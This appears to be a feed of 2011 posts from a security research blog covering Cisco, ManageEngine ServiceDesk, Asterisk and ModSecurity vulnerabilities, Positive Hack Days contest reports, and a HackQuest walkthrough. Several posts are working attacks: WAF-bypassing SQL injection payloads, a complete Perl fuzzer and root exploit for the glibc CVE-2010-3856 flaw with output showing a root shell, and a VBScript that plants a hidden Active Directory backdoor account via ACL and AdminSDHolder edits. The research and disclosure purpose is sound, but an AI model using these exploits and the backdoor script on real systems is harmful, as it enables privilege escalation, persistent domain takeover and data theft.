system:default-running-config system:memory system:running-config
system:vfiles
C3550#more system:running-config
00000000: 0A210A21 0A210A21 0A210A21 0A656E64 .!.! .!.! .!.! .end
00000010: 0AXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX .XXX XXXX XXXX XXXX

Example 3. Device memory

An attacker can read Cisco device memory, get history and configurations via «more system:memory/main» command.

Commands history (including passwords)

How to get configuration via memory

HTF

Install the version that is not vulnerable.

Details are available here: http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtk17827

Vulnerability discovered by: Sergey Pavlov, Roman Ilin (Positive Research Center)

ServiceDesk security or rate penetration testing

noreply@blogger.com (Yuri) — Thu, 07 Jul 2011 08:11:00 +0000

In penetration testing, Positive Research experts meet enterprise web-based solutions located inside a corporate network or on its perimeter. Applications like ServiceDesk, ERP, billing systems, etc. are examples of similar systems. The tendency «all requests via port 80» usually leads to situations when applications created for internal networks are published in the Internet.

Today we pay special attention to ManageEngine ServiceDesk user support application, that was first noted by PT experts in November, 2010 in penetration testing in a big company. ManageEngine ServiceDesk is commercial software based on Java, and aims to automate technical support service functions according to ITIL/ITSM recommendations.

We identified the solution on the network front-end, and tried to find details about associated vulnerabilities in public resources. But we found nothing. To decrease impact to testing network, we used vendor’s evaluation version for further research.

We installed the system on our testing machine and detected several vulnerabilities via fazzing and manual analysis (http://www.ptsecurity.ru/advisory1.aspx):
- Arbitrary command execution in ManageEngine ServiceDesk Plus 8.0.0
- Information disclosure in ManageEngine ServiceDesk Plus 8.0.0
- Root path traversal in ManageEngine ServiceDesk Plus 8.0.0

According to PT disclosure policy, we prepared and sent appropriate messages to the vendor. As one of the vulnerabilities was described 23th June, 2011 on popular resource exploit-db.com (ManageEngine Service Desk Plus 8.0 Directory Traversal Vulnerability), Positive Research Team published its details.

The vulnerability is found in FileDownload.jsp script and allows users to load files from remote servers. The vulnerability allows attackers to conduct path traversal attack and get contents of the file located outside ServiceDesk web directory. The vulnerability is especially dangerous, as unauthorized users have access to FileDownload.jsp script functions. Distribution kits for different OSes are vulnerable. In OS Windows, an attacker can get any file from the system logical disk. For Unix-like systems, an attacker can get any file if the user who started the application has rights to read.

The vulnerability was used in penetration testing to read ManageEngine ServiceDesk backup files.

As any enterprise-level application, ManageEngine ServiceDesk has backup feature (according to ITIL principles;)).

According to the system’s purpose, it’s easy to understand that backup copies include a lot of sensitive data such as identifiers and user passwords for LDAP/Active Directory/network de vices, SNMP Community Strings, etc.

We analyze backup architecture implemented in ManageEngine ServiceDesk and found out that backup files are stored in /backup/ folder and have names like 'database_DD_MM_YYYY_HH_MM.data' for data backup copy and its content, and fullbackup_DD_MM_YYYY_HH_MM.data for backup copy with user files.

The simplest way to conduct the attack is bruteforce, but we chose another method. More efficient method – ManageEngine system log analysis was chosen to save electric power (yes, we are Greene peace followers). We quickly find details about backup procedure in the received files. Below you can find exploit that allows you to conduct the attack.

Exploit for ServiceDesk v *.* OS: Windows

The most valuable data such as Active Directory user passwords, stores encrypted in ManageEngine ServiceDesk application database. Of course, encryption is reversible. It is named reversible as there is a method to get source data. Below you can find code that can be used to restore passwords.

ServiceDesk Password Encoder

So, the privileged user account is used for data synchronization between ManageEngine ServiceDesk and Active Directory (data is stored in tables domainlogininfo (domain user login) and passwordinfo (domain user password)), application web interface is available from the Internet, penetration testing lasts no more than 5 minutes as ManageEngine ServiceDesk application is detected.

The Directory Traversal Vulnerability is fixed in ManageEngine ServiceDesk 8_0_0_SP-0_12_0 that is available on the vendor’s site (http://www.manageengine.com/products/service-desk/). Vendor plans to fix other vulnerabilities soon.

Positive Research helps to improve Web Appliaction Firewall efficiency

noreply@blogger.com (Yuri) — Wed, 06 Jul 2011 07:36:00 +0000

Positive Research, the innovative department of Positive Technologies, deserves thanks from Trustwave, WAF ModSecurity developers for Web Application Firewall research.

On 23th of June, Trustwave, Web Application Firewall ModSecurity developer, held open competition in testing of web application protection means. SQL Injection Challenge competitors should bypass ModSecurity filter rules that block SQL Injection attacks.

The testing consisted of two stages. At the first stage, competitors should exploit SQL Injection to get data from database of test sites. The second task was more complicated: the task was the same but competitors should bypass ModSecurity filter rules and do not generate firewall events.

ModSecurity SQL Injection Challenge attracted attention of a great number of researchers, including experts of Positive Technologies innovative department - Positive Research.
The experts are usually interested in protection means. Thus, Dmitry Evteev, Positive Research expert, suggested a universal technique how to bypass ModSecurity filtering (http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.html) in 2009. New ModSecurity version design uses the ideas.

Positive Research experts successfully managed all tasks and bypassed WAF ModSecurity restrictions with the up-to-date filter rules. The developers are going to use the results to improve firewall efficiency.

Alexander Anisimov, Positive Research team leader remarks: «Web Application Firewall protects the most part of web applications from mass attacks. But our penetration testing clearly shows that Web Application Firewall version «form the box» is unable to protect systems from a great number of targeted attacks. So we believe the best way is to use WAF to eliminate detected vulnerabilities. The possible solution is to integrate compliance and vulnerability management system MaxPatrol and Web Application Firewall ModSecurity».
More details about the competition are available here: http://www.modsecurity.org/demo/challenge.html.

Details

ModSecurity SQL Injection Challenge held by ModSecurity Team, start on 23th, June. Participants could enjoy the process, organizers could get valuable information to improve WAF ModSecurity rules. The event included two levels– Level 1 : Speed Hacking (completed) and Level 2: Filter Evasion (is always open). Every participant should exploit one of web sites protected by WAF ModSecurity and provide organizers with database structure and certain table contents to complete the level. Test servers of Acunetix, HP, IBM, Cenzic security scanners acted as vulnerable web sites.

The participants should provide organizers the above-listed data and details how to get them to complete the level 1. And only then you got access to ModSecurity. This is Speed Hack itself. So, by the evening 24th of June there were no chance to have any uncompleted stages on the level 1. But, surprisingly, the participants completed level 1 only for web sites that were not hacked by the evening 24th of June. PT Research Team members easily exploit the detected SQL Injections that use MSAccess. Not long after, organizers confirmed us as level 1 winners, then level 1 was closed as everything was hacked. According to organizers, they processed about 500 solutions, but no one was able to exploit SQL Injection vulnerability in MS Access database. We think the reason is its unpopularity =)

Then we try to solve problem 2: exploit SQL Injection to bypass up-to-date WAF ModSecurity rules. We decide to use the method from the first stage – exploit vulnerability on the IBM test site (IIS + ASP + MsAccess).

To bypass WAF we use MS Access operators and the features of IIS and ASP association that allows us to conduct HTTP Parameter Pollution attack.

We exploit SQL Injection vulnerability in test site script transaction.asp. User input is insufficiently controlled in the server script that allows attackers to conduct SQL Injection.
Below you can find requests that are not detected by ModSecurity and allow you to get all necessary data to connect to web site database.

A crafted SQL request that addresses evidently defined database, is enough to get database name. Error-based method with bruteforce technique was used to find existed databases via requests with not existed database name. Web application responses with MS Access error which indicates that the database does not exist.
Here is an example:

POST: http://modsecurity.org/bank/transaction.asp
Content:
__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from a.c)&before=2—1

We use the same method to get table titles from the current database but requests do not include evident database name.
Here is an example:

POST: http://modsecurity.org/bank/transaction.asp
Content:
__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from users1)&before=2—1

Bruteforce also helps to get column names, but we also use error-based method and “group by + having 1” structure. We conduct HTTP Parameter Pollution attack to bypass ModSecurity.
Here is an example:

POST: http://modsecurity.org/bank/transaction.asp
Content:
__VIEWSTATE=[skipped]&after=&before=1231 group by 1&before=transid having 1

We have to spend rather much time to get data from the database :) ModSecurity filter blocks almost all useful functions. But we find the solution!
First of all, we create a special statement that allows us to detect data in database. Here is the request:

POST: http://modsecurity.org/bank/transaction.asp
Content:
__VIEWSTATE=[skipped]&after=1 AND (select username from users where username='admin')&before=d

Of course, WAF detects the statement. Top prevent it, we divide the request (select username from users where username=’user’) into several vulnerabilities.
For example:

__VIEWSTATE=[skipped]&after=1 AND (select mid(last(username)&after=1&after=1) from users where username='admin') &before=d

It works but WAF filters it: exactly “mid(“ and similar character sets. We found DCount function in MSAccess manual that together with WAF allows us to exploit the vulnerability and bypass WAF. Here is an example:

POST: http://modsecurity.org/bank/transaction.asp
Content:

__VIEWSTATE=[skipped]&after=1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')&before=d

You can get database data via bruteforce.

Greets goes out to Ahmad Maulana, Travis Lee, Johannes Dahse, Vladimir Vorontsov, Roberto Salgado, SQLMap Developers, HackPlayers, Alexander Zaitsev, Yuri Goltsev.

Asterisk DoS Vulnerabilities

noreply@blogger.com (Positive Research) — Mon, 04 Jul 2011 08:15:00 +0000

One of the latest internal project included heavy use of Asterisk PBX, which is the most popular open source VOIP solution nowadays.
Positive Research decided to check Asterisk's implementation of SIP protocol from security perspective. First things first and we used PROTOS test suite specifically developed for SIP testing. Test base includes checks for overflows, format strings, utf processing and more - you can check the whole list at their website (https://www.ee.oulu.fi/research/ouspg/PROTOS_Test-Suite_c07-sip).
This resulted in two denial of service vulnerabilities being found. Both of them were on their way to the vendor when we discovered that while we were preparing the advisories they were already reported by internal staff of Digium. The vulnerabilities affected version of 1.8.x to 1.8.4.3.
Security fixed version 1.8.4.4 is already provided at the Asterisk website. Let's look at the details of both vulnerabilities to understand better the nature of software security flaws.

First bug triggers when Asterisk recieves SIP request with malformed Contact field. RFC3261 SIP - Session Initiation Protocol: "The Contact header field provides a SIP or SIPS URI that can be used...". SIP URI in Contact field should be provided in brackets: "Contact: ".
Removing the left bracket of URI record and sending the request to Asterisk leads to a crash. PBX fails to correctly parse the contact information from the string without proper brackets. Source code snippets from channels/sip/reqresp_parser.c with bug details:

get_in_brackets_full()
{
char *first_bracket;
char *second_bracket;

if (out) {*out = "";}

while ( (first_bracket = strchr(parse, '<')) ) {
/* no <, no while body
*/
}

if ((second_bracket = strchr(parse, '>'))) {
*second_bracket++ = '\0';
if (out) {
/* found > and
* out = NULL as first_bracket is
*/
*out = first_bracket;
}
return 0; /* leaving here*/
}

/* error checking/return misplaced */
if ((first_bracket)) {
ast_log(LOG_WARNING, "No closing bracket found in '%s'\n", tmp);
return -1;
}
}

Second vulnerability exists in the process of reading SIP packet from socket and copying it to internal structures. Pseudo code of socket data reading and filling the request structure:

recieved_length = read_socket(&buffer)
copy(sip_request.data, buffer)
sip_request.length = recieved_length

We can see that data field of sip_request structure contains the actual data being sent to PBX. Copy process from buffer to data variable is done by vsnprintf function and is restricted by constant size, while the size sip_request.length is inherited from data captured directly from the wire. By inserting null-byte terminators into the message the length of data copied is smaller than assigned length to request structure. Later usage of sip_request.length leads to memory corruption which results in numerous faults.

Additional information can be found here

Author: Gleb Gritsai, Positive Research Center

Preliminary Results of Positive Hack Days

noreply@blogger.com (Dmitry Evteev) — Tue, 31 May 2011 11:14:00 +0000

The Positive Hack Days forum, which took place in Moscow on May 19, gathered a variety of representatives of information security industry. By estimations, the forum was visited by more than 500 persons, including representatives of state structures, technical specialists, top managers in the IT field, independent experts, and hackers.

Two programs were conducted simultaneously: a business program, which included seminars and master-classes, and a hacking contest program. The organizers sum up the preliminary results.

PHD CTF Contest

The forum included the PHD CTF open international information security contest. Ten teams from Russia, USA, India, and Europe have been protecting their networks and attacking the networks of their rivals for 8 hours. There were a prepared number of vulnerabilities that exist in modern information systems (e.g., SCADA systems, etc.). The aim of the contestants was to detect vulnerabilities, fix them on their servers and exploit the vulnerabilities to obtain sensitive information from the competitor teams.

According to the results of the contest, the PPP team (Pittsburgh, USA) won by a wide margin and was awarded with 5 thousand dollars. One of the PPP members said, "It’s not our first experience of participating in a CTF contest, but in the PHD CTF it was the first time when we were not only to attack other teams’ resources, but also to protect our own resources. We will be glad to take part in the contest the next year." Second and third places were taken by Russian teams Leet More (Saint Petersburg) and HackerDom (Yekaterinburg).

Boris Simis, Business Development Director at Positive Technologies, noted, "The PHD CTF is the first contest of such scale, conducted in Russia. Whereas in USA, Canada and Europe similar contests have been held for a very long time. It is connected with the fact that the first place was taken by the team from the USA, the country where information security issues are taken very seriously. We are sure that it was interesting for Russian participants of the PHD CTF to contend with foreign teams, and we are happy to welcome everybody the next year."

Contest Program

Hacking Safari

The forum included specific hacking contests. Thus, in the laptop hacking contest, specialists were able to detect a so called zero-day vulnerability (a vulnerability which was not known before) and exploited it to demonstrate that the latest version of the Safari web browser for Windows can be hacked. The contest was won by the CISSRT information security specialists.

Hacking iPad

In the analogous contest the participants formally failed to hack an iPad, because the program for exploiting a software vulnerability (the exploit) written by them did not work stably. Nevertheless, the CISSRT specialists proved the existence of the vulnerability in the mobile version of Safari during the qualification round of the contest, and the failure during the contest itself was due to the difficulties with the exploit only.

To Drunk to Hack

The "Too Drunk to Hack" contest was conducted at the end of the contest program. The participants of the contest were offered to hack a copy of the forum website www.phdays.com. In case of a mistake, a contestant was to drink 50 grams of tequila. Russian and foreign guests of the forum of the full legal age took part in the contest. Vladimir Vorontsov, information security expert at onsec.ru became the winner. After six mistakes he managed to find all the required vulnerabilities.

Fox Hunting

In this contest the contestants were to find a wireless access point, which was constantly moving around the place during the whole day. It is remarkable, that one of the contest winners was a young lady.

To Hack in 900 Seconds

The participants were to successively hack network equipment (switches) in 6 stages. The contestants actively used the hints, provided by Alexey Lukatsky, the representative of Cisco Systems. The winner of the contest is a participant with an ambiguous nickname "003".

The organizer of the contests program and Positive Technologies expert Dmitry Evteev commented, "The specialists that took part in the contests were very good, they coped with many challenging problems. It should be noted, that some tasks were too difficult for the participants, but it was rather due to general tiredness, accumulated during the day of informative program of the forum. Generally, I’m glad that the level of training of Russian specialists is no worse than the level of the foreigners."

Business Program

Leading specialists of Russian IT market from Kaspersky Lab, Cisco Systems, RISSPA, Federal Service for Technical and Export Control, Rostelecom, VimpelCom, etc. presented their reports at technical and business workshops.

The participants discussed such topics as cybercrimes and cyberwars, security of wireless networks and remote banking systems, DDoS, WIkiLeaks and sensitive information disclosure, the Information Society program. Technical specialists took part in masterclasses of various levels conducted by distinguished experts in vulnerability detection and security analysis of various information systems.

The Positive Hack Days International Forum

noreply@blogger.com (Dmitry Evteev) — Fri, 27 May 2011 16:29:00 +0000

Information security specialists, who hack computer systems and mobile devices to detect and fix previously unknown vulnerabilities in popular software, demonstrated their skills by hacking Safari, SCADA and by detecting a vulnerability in iPad at the Positive Hack Days international forum, which took place on Thursday (19/05/2011) in Moscow.

MOSCOW, May 19th – RIA Novosti, Ivan Shadrin

Information security specialists, who hack computer systems and mobile devices to detect and fix previously unknown vulnerabilities in popular software, demonstrated their skills by hacking Safari, SCADA and by detecting a vulnerability in iPad at the Positive Hack Days international forum, which took place on Thursday in Moscow.

The Positive Hack Days international forum was held by Positive Technologies (develops solutions to ensure corporate information security) for the first time, however the forum was able to draw the attention of information security experts from large Russian companies and from abroad. During the day, the representatives of Kaspersky Lab, Group-IB, VimpelCom, Rostelecom, Russian Argicultural Bank and other companies and organizations, including Federal Service for Technical and Export Control, conducted their reports, business seminars, and masterclasses at the forum sites.

Along with reports, various hacking contests were conducted in the framework of the forum. As part of the hack2own contest, CISSRT information security specialists demonstrated that the latest version of the Safari Internet browser for Windows contained a zero day vulnerability (a vulnerability that was not known by information security specialists before) and exploited it to run an application, thus demonstrating a security flaw in the popular browser and winning a laptop, on which the vulnerable Safari was installed.

Resistent iPad

The same participants tried to hack the iPad tablet computer by exploiting a vulnerability in a mobile version of the Safari browser, but did not succeed, since the exploit (a program for exploiting vulnerabilities in tested software) written by them, did not work stably. However, as the organizers of the contest told RIA Novosti, the CISSRT representatives proved the existence of the vulnerability in the Safari browser during the qualifying round, and failed to demonstrate it in practice, because they had not enough time before the beginning of the contest to bring the exploit to an acceptably stable condition. According to the authors of the exploit, the vulnerability allows removing and modifying any information in the iPad memory. Nevertheless, technically, in the hack2own contest the iPad withstood the hackers’ attack.

CTF/Freestyler

The main hacking contest of Positive Hack Days was "CTF (Capture The Flag) Freestyler", which is a kind of intellectual contest, popular with information security specialists in Russia and all over the world, aimed at assessing participants’ skills in attacking and protecting computer systems. The contest lasted almost all the working time of the forum: from 9 a.m. till 5 p.m. (Moscow time). Ten teams took place in the contest: seven from Russia and three from abroad (USA, France, and India).

The organizers of the contest developed contest software which imitated various real computer systems. In particular, the participants were to attack and protect virtual copies of SCADA systems, used for managing various industrial facilities.

According to the rules of the CTF Freestyler, each team was provided a computer system at their disposal and had to protect it from other teams, at the same time conducting attacks against other teams’ systems. An attack was considered successful, if it resulted in the loss of availability of the affected system. In this case, the team that allowed a successful attack against their system, lost several contest points. The team that conducted a successful attack, on the contrary, gained contest points, but only in the case if the team managed to capture the flag in the enemy’s system. The role of the flag in the contest legend was performed by a specific source code string.

The best protectors and attackers of computer systems proved to be the members of the USA team called "PPP", who became the first and gained the top prize of 5 thousand dollars. Second and third places were taken by the teams from Saint Petersburg and Yekaterinburg. Russian prize-winners were awarded 3 and 2 thousand dollars respectively. CTF Freestyler became one of the major contests among the СTF contests conducted in Russia.

Too Drunk to Hack

After the completion of all reports, hacking competitions and award ceremony, the organizers conducted a mock contest called Too Drunk to Hack, in which only persons of the full legal age could take part. According to the rules, contestants were to hack a copy of the phdays.ru website, which contained several vulnerabilities. In case if a contestant makes a mistake while hacking, they are to drink 50 grams of tequila.

Eight contenders from France, USA, and Russia took part in the contest. As opposed to the "CTF Freestyler" results, in this contest Russian information security specialists were unrivalled – the winner of the Too Drunk to Hack contest was the onsec.ru chief information security expert and web security researcher Vladimir Vorontsov. After 6 mistakes, he detected the vulnerabilities prepared by the organizers and hacked the copy of phdays.com.

Fuzzing and exploitation of vulnerability CVE-2010-3856

noreply@blogger.com (Yuri) — Tue, 19 Apr 2011 08:49:00 +0000

The vulnerability “The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads" detected by Tavis Ormandy at the end of 2010 force most users to patch their systems as soon as possible.

An unprivileged user can run arbitrary code with highest privileges in the system using LD_AUDIT mode in ld.so with spoofing $ORIGIN by hard-coded link and running a SUID program via file descriptor.

The vulnerability description includes only several potentially unsafe libraries:
liblftp-tasks.so.0 and libpcprofile.so. But indeed, there can be much more of them in the system.
If your system does not include the libraries, it does not mean that your system is not vulnerable.

The following exploitation method was published: create a backdoor file and run it with highest privileges via cron. But this method is not universal.

After a short research, we create a simple fuzzer to detect all libraries in the system that can be used to compromise the system if there is a vulnerability detected by Tavis Ormandy.

There is also an exploit created additionally to the fuzzer to check the exploitation results. The exploit spoofs /etc/ld.so.preload file to gain privileges. This allows attackers to gain the highest privileges in the system as soon as possible that is critical for penetration testing. See exploit is below:


#!/usr/bin/perl
use POSIX;
$ptxt="

 [The GNU C library dynamic linker will dlopen arbitrary DSOs 
 during setuid loads]
 [desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

";
print $ptxt;
our $old_fh=select(STDOUT); $|=1; select($old_fh);
# you can add your own paths to lib folder here
@libdirs=("/lib"); 
$tempdir="/tmp/fuzz/"; # temp directory
mkdir($tempdir);

#make some ascii
$total=0;
foreach $libdir (@libdirs) {
 opendir(my $dir, $libdir);
 @lf = readdir($dir);
 closedir $dir;
 $total=$total+scalar(@lf)-2;
}
$step=ceil($total/50);
$stepp=0;
print "0%"." "x6 ."20%"." "x6 ."40%"." "x6 ."60%".
      " "x6 ."80%"." "x6 ."100%\n";
print "\[";
foreach $libdir (@libdirs) {
 opendir(my $dir, $libdir);
 @libfiles = readdir($dir);
 closedir $dir;
 foreach $libfile (@libfiles) {
  $stepp++;
  if ($stepp==$step) {print ".";$stepp=0;}
   if (($libfile ne ".") && ($libfile ne "..")) {
    @dump=`strings $libdir\/$libfile`;
    foreach $dline (@dump) {
     if ($dline=~/^([A-Z\_0-9]+)$/) {
     chomp($dline);
     $ccc=`LD_AUDIT="$libfile" $dline="$tempdir
              $libfile-$dline" ping&>/dev/null`;
     }
    }
   }
 }

}
print "\]\n";

print "Fuzzing done. Thank you for using!\n";

opendir(my $dir, $tempdir);
@fuzzList = readdir($dir);
closedir $dir;
$libToExploit="";$argToExploit="";
if (scalar(@fuzzList)>2) {
 foreach $fuzzFile (@fuzzList) {
  if ($fuzzFile ne "." && $fuzzFile ne "..") {
   my ($lib,$param)=$fuzzFile=~/(.*)-(.*)/;
   print "Success: vuln lib - $lib ; arg - $param\n";
   if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) {
    $libToExploit=$lib;
    $argToExploit=$param;
   }
  }
 }
} else {
 print "Fail. No vuln libs found. Try another target ;)\n";
 exit();
}

$shCode=qq(#!/bin/sh
umask 0
LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping
echo "[+] creating /tmp/getuid.so"
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -shared /tmp/getuid.c -o /tmp/getuid.so
echo "/tmp/getuid.so" > /etc/ld.so.preload
);

if ($libToExploit ne "" && $argToExploit ne "") {
 $shCode=~s/EXP_LIBRARY/$libToExploit/gi;
 $shCode=~s/EXP_ARGUMENT/$argToExploit/gi;
 open(SH,">spl.sh");
 print SH $shCode;
 close(SH);
 chmod(0755,"spl.sh");
 system("./spl.sh");
 print "Hehe.. Type 'su' and be awesome!\n";
}

Example of usage:


dummy@bt:~$ perl spl.pl


 [The GNU C library dynamic linker will dlopen arbitrary 
 DSOs during setuid loads]
 [desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

0%      20%      40%      60%      80%      100%
[......................................]
Fuzzing done. Thank you for using!
Success: vuln lib - libpcprofile.so ; arg - PCPROFILE_OUTPUT
Success: vuln lib - libmemusage.so ; arg - MEMUSAGE_OUTPUT

Memory usage summary: heap total: 0, heap peak: 0, stack peak: 0
         total calls   total memory   failed calls
 malloc|          0              0              0
realloc|          0              0              0  
(nomove:0, dec:0, free:0)
 calloc|          0              0              0
   free|          0              0
Histogram for block sizes:
ERROR: ld.so: object 'libmemusage.so' cannot be loaded as 
audit interface: undefined symbol: la_version; ignored.
Usage: 
ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
   [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
   [-M mtu discovery hint] [-S sndbuf]
   [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+] creating /tmp/getuid.so
Hehe.. Type 'su' and be awesome!
dummy@bt:~$ id
uid=0(root) gid=1001(dummy) euid=1001(dummy) groups=1001(dummy)
dummy@bt:~$ su
root@bt:/home/dummy# exit

Positive Hack Days 2011

noreply@blogger.com (Dmitry Evteev) — Wed, 13 Apr 2011 16:06:00 +0000

The Positive Technologies company carries out a unique event - the Positive Hack Days conference, which is devoted to practical security problems and represents a place to exchange views, to gain knowledge and to obtain contacts and practical skills.

The conference subjects were developed with a special accent on the practical sides of urgent information security issues. The main themes of the conference are: web application security, protection of cloud computing and virtual infrastructure, counteraction to 0-day attacks, investigation of incidents, protection from DDoS, fraud resistance, SCADA security, and protection of business applications and ERP.

Within the bounds of the conference, the following activities will take place:

- Business program with reports from the leading domestic and foreign experts.
- Round tables, both closed and open types, which allow you to discuss complex and even delicate issues of information security with colleagues.
- Master classes conducted by practitioner experts, which allow you to gain practical experience in solving complicated information security problems, such as vulnerability detection, analysis of break-in consequences, and analysis of instruments used to conduct attacks.
- Breaking-in contests, which allow anyone to try him/herself in breaking-in iPhones, cell phones, browsers, and protection mechanisms.
- PHD CTF 2011 competition, which is an open information security team competition organized according to the Capture the Flag rules; within the bounds of this competition, teams will protect their networks and attack the networks of contestants for 8 hours.

The conference program is addressed to a wide circle of information security specialists, and everyone will find something interesting in it.

- Directors, CISOs и CIOs will be able to estimate modern threats in practice, maintain their skills, and discuss information security problems with colleagues.
- Information security specialists will gain a lot of new and urgent information and will have an opportunity to improve their practical skills in solving a wide variety of information security issues.
- Vendors of security tools and systems will be able to estimate the efficiency of their solutions in practice by introducing them into the CTF competition tasks.
- Companies providing services in the field of information security can become sponsors and get professional employees involved.
- All participants will have a unique opportunity to find themselves on the other side of the barricade and to take part in practical master classes and information security contests.

We will be glad to see you at the Positive Hack Days conference!

Backdoor in Active Directory

noreply@blogger.com (Dmitry Evteev) — Tue, 05 Apr 2011 14:41:00 +0000

Less than a year ago, there was a publication on habrahabr.ru with similar title [1]. Its author proposed a way how to hide domain administrator privileges using "Program data" system storage as a container for the "hidden" account with access limitations to prevent access to the account. But, despite author words, you can easily detect the "hidden" account and delete it with a couple of mouse clicks [2].

It means that this method does not work in practice. But is there more appropriate method (including without rootkits on domain controllers))?

As it is said in a famous detective novel:
- Where is the best place to hide a leaf?
- In the autumn forest!
- Where is the best place to hide a stone?
- On the seashore!
- Where is the best place to hide a dead body?
- On the battle field.

Similar to domain folder, we will take after the following strategy:

- You should not hide backdoor identifier, just store it in the same container with a great number of other user identifiers.

- backdoor identifier should not be directly a member of any group with high privileges in domain. It is better to use access control as it is shown below.

- It is not reasonable to insert back door user identifiers even in ACLs of privileged domain groups. It is more correct to extend security group privileges that are already members of ACLs for privileged domain groups. You can use "Builtin\Terminal Server License Servers" group.

So, to create backdoor effectively using the script, you should:

1. Create a plain user;
2. Allow the user to change members in "Builtin\Terminal Server License Servers" user group;
3. Allow the group "Builtin\Terminal Server License Servers" to change members in another group, for example, "Domain Admins".

Here we should note that it’s impossible just to change ACL for "Domain Admins" group. Active Directory architecture provides protection for ACLs of the most sensitive objects (adminSDHolder, [3]), such as:

- Enterprise Admins
- Schema Admins
- Domain Admins
- Administrators
- Domain Controllers
- Cert Publishers
- Backup Operators
- Replicator Server Operators
- Account Operators
- Print Operators

If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, ", or set "adminCount" attribute to 0 for the required object [3]. Overwriting the ACL template is more promising, as not every administrator knows this "protection" mechanism in Active Directory.

Use can use the following script to automate in Active Directory.

On Error Resume Next

username = "PT"
password = "P@ssw0rd"
userDN = "cn=Users"

joinGroupDN = "cn=Terminal Server License Servers, cn=Builtin"
joinGroup = "BUILTIN\Terminal Server License Servers"

adminsGroup = "CN=Domain Admins,CN=Users"

Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN
Set objSysInfo = CreateObject("ADSystemInfo")
strUserDN = objSysInfo.userName
Set objUser = GetObject("LDAP://" & strUserDN)

Set objRoot = GetObject("LDAP://rootDSE")
Set objContainer = GetObject("LDAP://" & userDN & "," & objRoot.Get("defaultNamingContext"))

Set objUserCreate = objContainer.Create("User", "cn=" & username)
objUserCreate.Put "sAMAccountName", username
objUserCreate.SetInfo
On Error Resume Next

objUserCreate.SetPassword password
objUserCreate.Put "userAccountControl", 66048
objUserCreate.SetInfo
On Error Resume Next

GroupAddAce joinGroupDN,username
GroupAddAce adminsGroup,joinGroup
GroupAddAce "CN=AdminSDHolder,CN=System",joinGroup

Function GroupAddAce(toGroup,forGroup)
Dim objSdUtil, objSD, objDACL, objAce
Set objGroup = GetObject ("LDAP://" & toGroup & "," & objRoot.Get("defaultNamingContext"))

Set objSdUtil = GetObject(objGroup.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")

objAce.Trustee = forGroup
objAce.AceFlags = 0
objAce.AceType = 5
objAce.AccessMask = 32
objAce.Flags = 1
objAce.ObjectType = "{BF9679C0-0DE6-11D0-A285-00AA003049E2}"
objDacl.AddAce objAce

objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo

End Function

I just want to add that, in spite of its simplicity, it is rather difficult to detect such a tab without continuous automatic monitoring. And following the idea, you can easily imaging more complex tabs, for example, allow users to manage group policies for OU with domain controllers, etc.

Complete Guide to HackQuest 2010

noreply@blogger.com (Dmitry Evteev) — Fri, 01 Apr 2011 23:32:00 +0000

This work contains the description of an algorithm to pass most stages of HackQuest 2010, which was held at the end of August within the scope of the Chaos Constructions 2010 festival and was available on-line in a shorter form in the end of 2010 on the basis of the SecurityLab portal.

Dmitry Evteev (Positive Technologies); http://devteev.blogspot.com/
Sergey Rublev (Positive Technologies); http://ptresearch.blogspot.com/
Alexander Matrosov (ESET); http://amatrosov.blogspot.com/
Vladimir d0znp Vorontsov (ONsec.RU); http://oxod.ru/
Taras oxdef Ivashchenko (Yandex); http://blog.oxdef.info/

Introduction

HackQuest 2010 is an open competition in the field of information security, the essence of which is to carry out a number of various tasks relating to information security: web hacking, social engineering, reverse engineering, etc. The contestants are given full scope for choosing the methods to cope with tasks. To capture one key (flag), it is necessary to exploit several vulnerabilities existing in real production system. Thus, the contestants can feel themselves to be real hackers :)

The competition results showed that many tasks proved to be too intricate for most contestants. The materials given in this work represent a complete guide to solve most tasks of HackQuest 2010.

Task #1: Classics

Preliminary network scanning allows one to find a web site of the Chaos travel agency. In the search section of this site, an error message issued by MySQL database allows one to reveal an insert-based SQL Injection vulnerability.

It should be mentioned that the site is protected with mod_security with standard rules. A vulnerable SQL query has the following form:

...
$query = "INSERT INTO indexes (text,source) value ('".$_GET['text']."',".$_GET['action'].")";
...

Thus, a query to conduct an attack can look as follows:

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+user()+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)*/,0)--+

The query given above will display the identifier of the user whose account is used by the web application to interact with the database. How does it work?

1. A construction /*!...sql-code…*/ is used that allows one to execute SQL code bypassing standard rules of all mod_security versions (including the latest versions, see http://devteev.blogspot.com/2009/10/sql-injection-waf.html).

2. The symbol "+" (%2b) is used to work with strings (for details, see https://rdot.org/forum/showthread.php?t=60).

3. A universal method to transfer useful data in an error message (see http://qwazar.ru/?p=7) is applied:
select 1 from(select count(*),concat((select user()),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a

4. An SQL query is transformed into a syntactically valid expression by adding the construction ",0)"; the unnecessary part is cut off with two hyphens. To ensure that the end of the added query will be cut off at the web server, the spacing symbol "+" is used (in HTTP GET request, this symbol is equivalent to the space character).

